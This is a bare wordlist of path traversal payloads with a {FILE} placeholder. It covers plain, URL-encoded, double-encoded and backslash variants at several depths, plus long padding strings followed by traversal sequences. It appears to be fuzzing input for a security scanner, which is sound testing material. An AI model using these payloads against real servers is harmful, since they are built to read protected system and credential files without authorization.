/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/\../{FILE}
|
||||
/\../\../{FILE}
|
||||
/\../\../\../{FILE}
|
||||
/\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../\../{FILE}
|
||||
//..\{FILE}
|
||||
//..\/..\{FILE}
|
||||
//..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA